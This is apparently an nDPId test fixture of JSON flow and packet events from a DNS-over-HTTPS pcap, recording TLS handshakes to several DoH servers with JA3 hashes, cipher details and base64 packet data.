-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378281,"flow_last_seen":946739378281,"flow_idle_time":7440000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739378281,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00853{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":946739378281,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":344,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":344,"pkt_l4_len":310,"thread_ts_msec":946739378281,"pkt":"REREREREZmZmZmZmCABFAAFK6MRAAH4Gn0EKAAABVQVd5uaSAbv2ZmEwaR3\/oVAYAfZ05AAAFgMBAR0BAAEZAwPCcBaP\/DC8hVoTSokbsQvpjhaLnYrt7eKsiMQ8EXb5AyAAGOihE6CuqcDNXckkTdE7CmzbbGzUcC6GWkBVFb5CcQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACqAAAAGQAXAAAUaWJrc3R1cm0uc3lub2xvZ3kubWUABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg6FKiZGfISPafy0Na34RI3z\/9T8Zo5Ona0mhcVKXwyTI="} -00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378281,"flow_last_seen":946739378281,"flow_idle_time":7440000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739378281,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ibksturm.synology.me","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":946739378310,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":153,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":153,"pkt_l4_len":119,"thread_ts_msec":946739378310,"pkt":"ZmZmZmZmRERERERECABFAACL5iJAADQG7KJVBV3mCgAAAQG75pJpHf+h9mZiUlAYAFOUtgAAFgMDAFgCAABUAwPPIa105ZphEb4djAIeZbiRwqIRFnq7jF4HngniyKgznCAAGOihE6CuqcDNXckkTdE7CmzbbGzUcC6GWkBVFb5CcRMCAAAMACsAAgMEADMAAgAZFAMDAAEB"} -00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":304,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739378281,"flow_last_seen":946739378310,"flow_idle_time":7440000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":946739378310,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ibksturm.synology.me","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":946739378311,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":946739378311,"pkt":"REREREREZmZmZmZmCABFAAAu6MZAAH4GoFsKAAABVQVd5uaSAbv2ZmJSaR4ABFAYAfZzyAAAFAMDAAEB"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378577,"flow_last_seen":946739378577,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739378577,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00845{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":946739378577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739378577,"pkt":"REREREREZmZmZmZmCABFAAFDLylAAH4Gh5EKAAABaBwcIoO8AbvZKqUSoyMYWVAYAfZGMAAAFgMBARYBAAESAwNktN1XF4bqrby0niN\/MgT4p6NPXKBlRwOJCoza94pvXyD9DZHEPvQMzjP6pbu5TmyGbnG5vDXlt6MJFI6XifT24wAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANanAudGlhcmFwLm9yZwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACBNe3CKgugpSU\/ahaeKXUN1ypv0O\/7wv4rJDS1FbyCQKA=="} 
-00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378577,"flow_last_seen":946739378577,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739378577,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jp.tiarap.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -03848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":946739378607,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2557,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2557,"pkt_l4_len":2523,"thread_ts_msec":946739378607,"pkt":"ZmZmZmZmRERERERECABFAAnv8ehAADcGAyZoHBwiCgAAAQG7g7yjIxhZ2SqmLVAYAEJO3AAAFgMDAHoCAAB2AwM5\/Tpf+0rVAVLiqp3AKzeP0oc5LUJ7LbPa16oj3TgNDiD9DZHEPvQMzjP6pbu5TmyGbnG5vDXlt6MJFI6XifT24xMBAAAuADMAJAAdACC6HV5GLKVmM89uM3s2SIWu43Lfyhq5unw8YJ6WUfrNYwArAAIDBBQDAwABARcDAwk9PLTYD+JT2QAppt0TUbAwAmxAstQCMsQy32ww9oSEEAAMGSMNt+TTdp0V3tZ3ctmeFKC8drVcJHMoKPW\/gLMtyIUmD\/3+eYMhUKtI+3FRz671m\/FiCxQ+DYhEAA2djrJV7bAD8riXyaqFyW2aaJF84flOMuq9DLwOUI0IypM1HnMNVT7vNmCordbJ4vYfoJCHZ3Jdxa1PMxflxUdqb7t2xbf5y\/m1Lgj+QBUEN2VGq3ZK1ktt1GgLlt5OMY6q\/EMncuhg\/OHccuz87CSxEURWL2O5XG3NQ8ZSkyDIF1XtrmR6FGXAhlzN0GIMFD4mIZ5QqyhyGprKsDD36CWqaTOR27WUIRMeWgua2kpjr+elVVRiIT0yfyvShMeR5KvvMj5AG9M4S4\/qWWxJjIv9qLfYm7RWSC4r34hNlFnFlqsqqqzzh\/B
xMvV1bwxfAaqA1qBideWKRVA+7EuN95c4ue7X\/hRVHEx3iQLqTqKG9s8vcXeE42KLZOgVl3B7xu8\/i92\/WkhbHAp1VaoXVrJw6GLiISb\/po8DiOQt5NIdGX5eDQSEZ7O9baKasLWzq1YkwfZijF3n9KVs9qv2KSy5IfvS0SD4T0T96JowaLvO1lvBNbG7CindkMAn7au9+n1sxBnSgPOEhxjP6eP7I9klViNjl15nUFM6o4r0CQuVxRwVYjFh10tMhUtqr5ufjJtftBeIT7Z6ffMsMrzPdyzkIvDM+swGXo7V35YzVo8DyoBYe9uM0JJnrorf04OKftnG+pjuV1J118k\/TcF7dgWMascYwrYulqMRqr3vNGGbqZxylwmKp462M5UtGuo+qerBWSrRXWS6eh\/Pd34MrDX1VmvCOR23Z07RB6KZ9U0a03sYPKhsU\/m8X7Y3lJg3mFbu5qAjYzD1O+cD4Myf40iIoCP9xcs4bu1pUmgjVbsp3ut86GCDAgM+2h3m+dYO91dTNrC6JdnpsdKfoGqobbC1Nd6P0Kznfd6xn\/BQDvXNQHfd3IPzPYj2FRyDUuFDyWgT\/cwlGc7O60WUydzXXvs9ttqI8TuCUJYd1Ao8xx8mAgIvrwtyiwJR5QZQxYq0NnVo97JO1hRxuXJb+LTsywktm+cb6647KFCAIE22xi+EiXjOKZOlKgY\/++l2PKcbQh7+iHITgTYo09PyNcnTJxUwLKCZUcpj08uHLE+si9w6kmA+pKFDGKHD2OQi0\/dVl+2FqCH2+A3DCa2Gg9EWzElOrJ9mp3PsOzxGAh1T1616sYT0her6SVuXlhCGP0slwtRkTfN5tnJIo22tEgWtQ+b6y1PTsvRTouR9DpgUBw8BD3g0lRYqf3KAJIjUNpSvsRMGe0P3S4KCcJTz19EnjfZoP6uX+a1+4rjk2AihvF76LGF5wO7bsnmmIDYTvndhSZUKAm3a49yHTGG7gVwYkqmq0TRbx3kmFRXEBuvlULDIz+RlQyLwuJX5uRyHubvUf803FCAz\/4a9pnE6WEDc+zOoXHErWhAfoc5tjJI1gMxGX8U3yJwrwEtij2gQTn0Bbv4+6DXg8iV1mRetvz2V395BS+h9qVm0PJky45RjI5FxKVNW8VUHbBkrW32Ln2Pm3mojmUt+Xsx7zInkOkVoS97LxHGe13JTpikDPPGgpjpEoHIcQRKqtRb0XznaWZx01cfmn3isfcOxCOvXJUXQwHOBr0ZOeVU8JyV5j86F3c2x16THC9pMZadmbjMRbWkSLTw4DMHNpPKhS6WbcQJhxPZwfAVbKEjktlF0JguUnWmRyDWlD919TvF+XWK\/xSop+ME26vjlWYdWryJvX71XiN34ciEg6jsS9BSYdT6j+C8MLHQApTVrKIlUjg7LizXHOZ\/8TbPIjDL1MmbwanCPsnz+x51R4gaxLum0nLoSL+ZmdQWjq\/uyo2YE03WUuDCwEqP451PgmdaqLRPfWLB1DwCAkXZchOxevuMOjyvWV6dC+e+ksCIkxwJmTgcBQXwfuBwje22m5Cj2nv\/zq4aMsV7kiFOS1VcPYLEbw+c4UolvdLrBBCbMxCQZeGhjAzGdsZDuX\/6sRIGIbuHAE8nIh+KJ0joM4KoZNtLXSA2HqbNN+kRQ5gTFmAp4mqAOgsHxAv6V1xCZg8P3MEffeog7NEB4\/K8wtwtgVyjvZaZ4E5jbN5Fjj\/jqK88SEXhkPYnN+on2bA\/r\/BMBIaoCajkogUyGLoyIPMT+pBrWa+wfZKdLurwPxZw+jCxKJC0\/mmFBL81N3ktV2QA+uWulN8QPCd7cD0\/Hjf2QklIJga5shMEJkHY6px3Tk68O3abNmIreZ6S\/N71agsTVbVTSaRlprW4p5D79LYThW+q2zikyKF2eG4VtVQ1Z087sY8sCBmmZG8ETPN5Xq0TN3Q1mXCkwjS9y4DvkEf4d2VKsFN6yj110+kO
NDzC8lVgKicr46oqIhZ9cyUDwr5+MuFqHiF2KMvJx9XA7v9+a265RIEavlSRTRm3PXbeYNOWUADrJWXjguUacdKmikyCoiD9vRp7ll6YxsV5jSfRT\/9SmZeNE+aTDy2wakB7qY1oeeLE4kVchDyQa22zUAtVHOgOvTZInJYA\/takDFgegJnQaYWISVIejbCOHLLvY\/LGAj1CyqRrh1\/LJm06TJxFQn5cMNb5SSEJFNyxF75PSPT288zWx2Va0aIhDIB+vku9QlaiV4ac8CwDTFNaqbQKECa5ibv22eB002L0jyDWacUoUluFvwofh+CTE377hEPfvjsRjX+V3P\/erPya8F4fW7JQkFJgCrTK1VaoDF64ZvLzNQJ5aCIC3Js6D+sD6g4jOpLHGy2zHMlk9wTN+yBybuSBsrJL9uS5j3JgQRC167kARpn8\/3wkN3\/lvlFPoVYVhj99l\/NeW6y\/YdomeNnyw0D7qas3wz1t0EQFticUf9LLfRMzRHEf20AYOoy9Fonct0XWUb6fLDU7CQJTqCHU8Eiy+rgD2t\/dxE4NlpfZ2ZSbDZ7QWFdftipHKlR4nJqLL0sU6kjZ8SydsZ8oAinHCIV9v5PNYgUBa8WbGYb2kgxJMSN3jbYzsoGwAsbdeAghc0S7LurZvISJXwa0jBqUzUHZmweZXCdDnfDiPc92KCXG9hA13VfXTouQnTd0zyBwPxIcvLGDhAu1CCSmBlGZrOEjmOi1\/i4ug\/A=="} -00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":326,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739378577,"flow_last_seen":946739378607,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":2503,"flow_tot_l4_payload_len":2786,"flow_avg_l4_payload_len":1393,"midstream":1,"thread_ts_msec":946739378607,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"jp.tiarap.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":946739378610,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739378610,"pkt":"REREREREZmZmZmZmCABFAABoLytAAH4GiGoKAAABaBwcIoO8AbvZKqYtoyMiIFAYAfVFVQAAFAMDAAEBFwMDADUQNuPt6m2nY9MgXiEHZRB5L+gDtuMOMxUUfy82Uox32sOXoFpXHp3NUSfU3Rmr6gABtUijkQ=="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380697,"flow_last_seen":946739380697,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739380697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00851{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":946739380697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739380697,"pkt":"REREREREZmZmZmZmCABFAAFIsgNAAH4Gh+8KAAABAQAAAdIqAbvH6z5LSWNp6VAYAfbC9wAAFgMBARsBAAEXAwNccnLckexdP3Wz7tsKiknbwUElui2FZGSKODu9LnFkjSDCKDL2dIORj+O\/DGu\/+ddISHKLc0yxsHWSEQ0iee1a7AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zLmNsb3VkZmxhcmUuY29tAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIM\/CjtFE6\/BfV0qVOcMMUIig11i56\/tpHaQ1FlARye8w"} 
-00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380697,"flow_last_seen":946739380697,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739380697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.cloudflare.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04322{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":946739380725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2892,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2892,"pkt_l4_len":2858,"thread_ts_msec":946739380725,"pkt":"ZmZmZmZmRERERERECABFAAs+VjZAADoGHccBAAABCgAAAQG70ipJY2npx+s\/a1AYAELM7QAAFgMDAHoCAAB2AwNqFtv3xWSYHbL\/TEVcxTgtPyY5syhT1Ar0J7GcYm2olyDCKDL2dIORj+O\/DGu\/+ddISHKLc0yxsHWSEQ0iee1a7BMBAAAuADMAJAAdACABwPRBPqMH6tP2UgTdU38yy4IBdMrNy3Y26n6nkJgoEgArAAIDBBQDAwABARcDAwqMAOf8HgLdG4eR2zQrlVcXNJK6gSgekjnntDDuH\/5mItzTS2PjuRorCZtp1e456Yzxd\/c9Pjo0KqOApsf0Oet3HLAxOPX\/4mq0oqPJv6\/pWYh6XkL49x7kn3sA8FLizWIik5oy6pRjSBWFf6tqxUO+Djt17wQK6yhMls9hUq1ClHJUh6Qn273NZpiWOuHCd9wGeCfeInHvS8qk0EqIdne\/5O3+AKgM\/cALapdKbBhIoAyrPwqC2hLjGuasAzda3QO\/+ESHum\/F9d6o\/5K+8IYpY8o8qtVJ6Drg8futbzGhAS87lZYW5UeuuFH05CzhM6cODq7gNj4mbPjTJ5ApTRpwsXEw0cwu6tAiKdHBHu4s131JOS1nhPpDpOs1W8FqhOijP5pChk7nVfwQ9Bu1xYiYmTlZWYP4bC0IhVSltsY4+ff
d9etk6QNu1u5Seoh1QaWRe4DU8GYPqDdj9ywHuBnTu\/kdk6yObRcYizbhLyG5JiQSyxA9bv7iPMzOSI\/oPD6Rw4c6cy1qJywZ7F9o\/W7KUU6pYYhqWRcunfBOy2cedxZtVaWxcAQGD7VjEr1GjI\/ndJEL6DV\/vUO5PSsHgdX\/GScVrZdS\/KHwHxAHOv1BpKxNHl+ElIeVfCJc4tBsNkoBf5+COT0BV1cqDq\/0TqIcpVxlMv3\/7JDTZZTI\/wMxcbTZkEC580\/OL4P7o7ZBv1lVciiiGUxirK0Wn0VmKVkOPUH1VVDEVtxbspQjAQAudOqLnKMivdYYnLWKcLFjjfuE8XwFn1JkF2YyGgtdu+0wxe7V3QdQyeX6wSKDfGOBn1RHTiZSQJLrjf\/MjK6PK6+6dmcX2K\/Nos\/HKCWzOCSGOxH6pgvl94s\/0dDawx7iAmW0aKHP7fN\/Qsuj7qBRlYmeX3wDSe3ACAyO8PJtifBKRUnx+i44zF\/TEZT9\/0f9hj1yXYZhM4IttxvCtS3N7k187lM2JB6HB4DmePSpA5UfxEPRq71lNWUsDLAAiN3ekJSKoZ7PUpp\/6SJsuSwyITjf4EqBLpeWL9MrWeNXoUk5W1F7hWZmXxUwbc9PMEuirTVJUIeKJcMT3hUo1x6K9jQ+3H\/3FjLuAvSaGN20\/JlmWzUhH2c19MbTsBdNUca8p5h9ftAYWxNZFi+BPME56GacRIjusosOaDm6TM6NIeJtcd5nQ0Y6NbfwEe7MdB0akdNH1SZ5FpPCUXE+5h9eWmGzxT6gCZx6qvA46+kjmSPa8Cj85dDYPgUItxPMDzQDmcDkFl4Jtoqp7CsVbgDs2FaRSNSCg+ZMEThJQx0\/Aqz+vGM8Axcf5cpBgdqJqmkgft7WVM6LgxM0bWa6ReLOTbftdrjvt51qS7oW8iSFCaAMyVHnB9nNub1rCB71JGnHgmpLaDriPHmvZHyXG+tF3YYxqKFpVLMzSELDqif9S44Mrb9ZjnIWKvGQryM\/QSKoEg5X7zctl4vxNBFap6BlJhqRr3fm7FAc37N2CcUPqfx3Q8d+odOusP4Ls3Xq2Sur1UmBSNW9zqMAV9eCaagN4swiO+HX9D1JhZPxXTW9QWyDXi2zI1HI7LUB70fqeJS7u5T5BooNTQeoNzZVCvWOXWLt+ZiIbxI46okrDHFQXi\/x2G\/UqXdfkOEinNyh78FxOnrKcOtvfU1vQdaz7Z3d1S6XTGxIbp7Avs8yqCBkfYYx0okhQoRYkFViIAKhs8EJ22ENemkpy\/xMNRrY7HXIqAF0plC7ASy6aRPBxNQLpe6Ed5IaeUHDV+pWuEiLAgXAO3BIyMmN+dKwyJRSjGew81SAxYCXzqNGK2p7GdpO\/XP0maghqEG1aIROtTBX2ArldnERnpk4NXjDbfgsSkzP20ClfXeN4yjZTmAjINRHsDFyBG2kVPsbWM6bJ6sXUqNBkjHzH8mUguB01CThNReqO2rGsLiKr5qTMAwxKxjfEdoEJ+OdtfVMDr3B0PaBDiW6NDXICwJTMjrTiHsqLMySrS2T3BXPc1yBL+jDROuKYyhTZQzCA6ktzSKC6wAMC\/2RMbHnV4JUqSuJoXnZI1jiGQfafDh9qm0ZR91\/Upntxs\/kWZ9Zofn9x4gsvGL94XY2stn+kYJ+lpR5T38ZBRBOsXu8bAGsKAP+3wt7PlEML8VYdMSv1Y8XhaZ4vQZT4mxjokM8a+\/vbBm5OFXEOAsw3UpeMp5Pdlywdfks9xANyyHcs7XyT+4nzRjV93W+RbJVksh761\/0CsogB0Bf4AeRq1b8bSy2mVWD\/C9oBFlc4PSw+jhx1uKdorr8amCiJ2bwSUXaBBKYKGtf3eKS0Vrr8DWhAzmAupA8TRMiBwDgWH\/pSpuuBxo4fKT36lTdVMpKIp966xzVRYeAdyJ8dQTy5jeDQL1o\/K9FAvaIxIHdqy3Ai9Up
xdTmYwoZXk1RGWSFQPWK2eEqydFLHkwLiG2A9OQ8pCYrZlqHUn1snev7fQAbwrXFOXDJskS+CYp+0GQvu\/Fu37N\/vYvDe9yQ2BjQyb\/Aq\/mNLHkdVzTu+oIIX6og2jNse2SlImfdMuiBssQFePUieOP3nrkgegmZDkJvZU8\/IJtyIPGhvEr4wy0KRjmbk1R5TV1oh+Gvyump800hgoeZ6yINLishVXjkSrZbw30TzgVyIHMXbfVH5cMb\/otpjX8v74ViZ68NiQoVQGCiu9Qccb9jITaHI7YqId83HAhD0Mgcvql8x4riVhsLhWBp7KARZMNylg6FCWQzYhkomLcDqOeaHr\/i3Kucv0p5GzUzkUvhbOyyBarVy1r5EY3Ff\/LeERfwiWeu9JMjSlW9a76FWzNvpbjiVQvAXjpJS+B6vW0S676\/2F\/QVlBvmv\/1e3jfE46NEORC\/KvStAu1+NCVXXkgYYjYaavSuMFqEVMBLpNt3pqmD175kYHYjG6R6TDv0nmjRk\/fdkSOg4ydMi2g43e05SDICPCTBrKL+H8pdmtKEp3WxofXZCtNR+ckTvaTdfJXZMWJbImpAgp0edudixTNqo9z3f5BRBQ1U170EzzThEQIMmS6RHUG4MBWpfatZDm+5s5WqxzAc+f48z+5\/Rjpm1MjT7FAj2QOS2mS1pZuw8jR7f9mlmDHlYUa7yULFKz+EOcDFjny+TGuKCw6tBmvp0uAgOgbWkR3PGwLQlgJNN5qcasz\/DdlRFFRc1kdK872NuK41RPGMSa34kfvjKckPj3jn4ntsF1i9WcRtXZaTKddZmAVoibh8F7o+\/2BqWfWHshjLjbv2UXOWt85MGeIvvR+JAZ4lQKxhMp4ApqHsqTnv9vjAIsk+AJwp0L3kf96BrAf5lxFwLByeiu2ScazZunSG5IvLxJ2cCZzgYOFm\/xSZPCmFYvKNJw727A0qH0cpDBKVk4Z5vvRen3ROFERblATF0imHD72RVGcQ\/rMrcnTAneuS+605QxQwV5cyssndlHujOT5cJjQwi4Me+A9i\/U+gGMItbvzyiV\/bH\/dnSH\/6+REX1pIGyZTP+9n2MXLAZnibrKAMIRfK2TIfrOe5jmJF94vcBm\/\/5ycPeTZII89RYTOm\/OYD7dCL\/Fj+p2ZF9GMMq1KmH\/crTCIqHICoTep9ezhaM3lurJnltFyZNv3oliEoTfl"} -00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":343,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739380697,"flow_last_seen":946739380725,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2838,"flow_tot_l4_payload_len":3126,"flow_avg_l4_payload_len":1563,"midstream":1,"thread_ts_msec":946739380725,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"dns.cloudflare.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 